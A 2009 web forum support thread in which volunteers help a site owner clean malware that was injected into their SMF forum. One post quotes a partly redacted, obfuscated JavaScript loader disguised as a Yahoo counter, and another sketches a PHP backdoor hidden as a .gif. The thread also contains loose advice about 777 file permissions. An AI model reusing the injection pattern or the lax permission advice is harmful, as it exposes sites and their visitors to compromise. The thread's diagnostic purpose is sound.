Error in Sources Folder

Rumbaar · February 20, 2009, 06:17:17 PM

Well the fact you couldn't get package listings before that would indicate you weren't 100% before 1.1.7 as well. As for the warning only on the PC at work, I got it when I viewed your site source and so did a fellow Support Specialist when they visited as well. So I would guess something is a miss.

Using the large Upgrade Package to whip all current contents and 'installing' a fresh forum will ensure that all files are clean and without any malicious coding. Should also solve any current source/template issues with the package manager. You'll need to install those two mods back again though.

Rumbaar · February 20, 2009, 06:47:47 PM

Looking at your source I get other errors, I guess it's trying to access an exploit in adobe acrobat reader possible.

in your source this doesn't look right

Code Select

<script language=javascript><!-- Yahoo! Counter starts 
if(typeof(yahoo_counter)!=typeof(1))(unescape('$%2F~%2F&%3C%64%69%76~%20%73%74y`%6C%65%3D%64%69`sp%6Ca~y#%4E~%6.... contents removed ....1#%6De%2E$%63%68%61%72%41%74%28!0%29+%22|%3E%3C!%5C|%5C#/`%73cr#ip$%74%3E$%5C~%22#)%3C%5C@/%73%63%72%69@%70t%3E&")&%3B\n/|/%3C%2F~d`%69$%76~%3E').replace(/@|`|\&|#|\||~|\!|\$/g,""));var yahoo_counter=1;
<!-- counter end --></script>

Have you installed a yahoo counter and is that right?

LeddaBlue · February 23, 2009, 08:15:40 AM

yeah that looks strange I never installed a counter from yahoo, I use the counter in my control panel with my host which isn't on my site directly. I installed a counter a long time ago but it was on my main site which is just www.fishenchantment.com, not on the forum.

My host did contact me and told me I have to run a virus scan of all the contents of my site to find the malicious code, they assured me it was not on their end which is what I initially thought.

Where did you find that yahoo counter code?

I'm going ahead with the large upgrade today and I'll let you know if I have any issues. Thank you for all your help.

LeddaBlue · February 23, 2009, 04:19:12 PM

OK evidentially that code you posted is the malicious code because I cannot even view page three of this thread and I get that same error from AVG.

Rumbaar · February 23, 2009, 04:52:07 PM

Well where it's stored could be in your root index.php file or most likely your themes index.template.php file.

Now how it was injected should be looked at. It could be from an insecure host, or it could be via a malicious file uploaded to your forum. You allow attachments, but sure to check those folders.

LeddaBlue · February 23, 2009, 05:41:04 PM

so if I do the large upgrade will this fix my problem? I sure hope so...I have to get stuff backed up so I can do the upgrade I'm almost done.

John Eric · February 23, 2009, 05:47:24 PM

Quote from: LeddaBlue on February 23, 2009, 05:41:04 PM
so if I do the large upgrade will this fix my problem? I sure hope so...I have to get stuff backed up so I can do the upgrade I'm almost done.

only fix is erase all and begin with new SMF only
see, copy "big update" =

Admin.php -->(bad) Admin.php (ok)
Display.php -->(bad) Display.php(ok)

Nasty.php

clean all!
greetings and good luck with your big effort

Rumbaar · February 23, 2009, 05:56:57 PM

Well in theory you're overriding all the files in your forum with fresh ones from the large upgrade package. So it should eliminate any files tainted with this malicious code.

But ultimately if they were able to do it once, they might be able to do it again. Finding out the how will help prevent it in the future.

Check your files outside of SMF for any malicious files, also check your attachment folders.

LeddaBlue · February 23, 2009, 06:07:24 PM

ok I will check all of my files, I don't know I already checked my SMF files I could not find that code, this just sucks....

so does that mean if I do a large upgrade I lose my forum? and all the info? would I be starting from scratch?

John Eric · February 23, 2009, 06:23:54 PM

also, with PDF exploit to read http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9128428 !
always say no to JS as 1st setting

Yes rumbaar, but new file could sleeping, then thief just:

http://www.yoursite.com/forum/sneaky.gif <-- yes! it could be .gif!

sneaky.gif/php can include settings.php and then have the database or edit index.php any day.

_>Leddablue
you will not start from scratching as you have more knowledge today than yesterday (and scratching is good anyway for music and prevent more itch) list all of mods and then strike mods you can avoid only keeping the uttermost important ones -FEW MODS = good

Just do not lose your settings.php (but examine it carefully always for strange insertions and verify CHMOD != 777 , even if you have to do big chore of chmod, change, then chmod again

Rumbaar · February 23, 2009, 06:32:47 PM

You will not loose your forum if you use the large upgrade package. The only folder is your attachment folder that you might want to keep. But yes check this one for rogue files. Then check your settings.php and settings_bak.php file and you can delete the rest.

Once you've uploaded the new fresh files, with the old details in your settings.php file you'll be at the fresh stage of an SMF forum install. But will have all your forum data from before the refresh.

Be sure to fully backup your files/folders before this. So you can recover individual files if needed.

LeddaBlue · February 23, 2009, 07:28:58 PM

thank you, I will let you know how it goes (fingers crossed)

LeddaBlue · February 25, 2009, 04:36:47 PM

Okay I'm a little confused but very HAPPY! Today I signed into my admin panel of SMF and I noticed a red box with an alert that the current version of SMF 1.1.7 was out of date and has bugs, there was also a link that said UPDATE NOW. So I clicked the link and it downloaded the package and wala! it upgraded my SMF to 1.1.8 and I can see my package manager again. The malicious code is gone and everything is working fine. I think I did find where they put the malicious code, I think I found it in my settings.php file in my main forum folder.

So this is the response from my host today
Thank you for using our services.

The malware code was inserted into the php code of fishenchantment.com/SMF/Settings.php script due to the 775 permissions whihc you have set to it. So in order to resolve this issue you should open this script, remove malware code and set 644 permissions to it in order to resolve the issue.

If you should need further assistance please don't hesitate to contact us again, we are available 24/7.

LeddaBlue · February 25, 2009, 04:39:26 PM

I remember you all telling me to set the permissions at 777 I wonder why they said 644?

Rumbaar · February 25, 2009, 04:53:30 PM

On most secure and correctly configured hosts 777 shouldn't be an issue. If it's an issue then a person who can exploit it can do more than just insert code.

If it's set too 644, you wont be able to alter it via the forum and any future changes will need to be manually done.

LeddaBlue · February 25, 2009, 05:01:05 PM

that's what I was afraid of so I should have them set to 777 I guess I had them set to 775 I wonder how that was changed

Rumbaar · February 25, 2009, 05:32:55 PM

No that file can be at 644 or 755 without, I think, adverse affect on your forum.

But other files like index.template.php are targeted by these people as well. Usually any file that is always loaded by the forum and writeable.

News:

Error in Sources Folder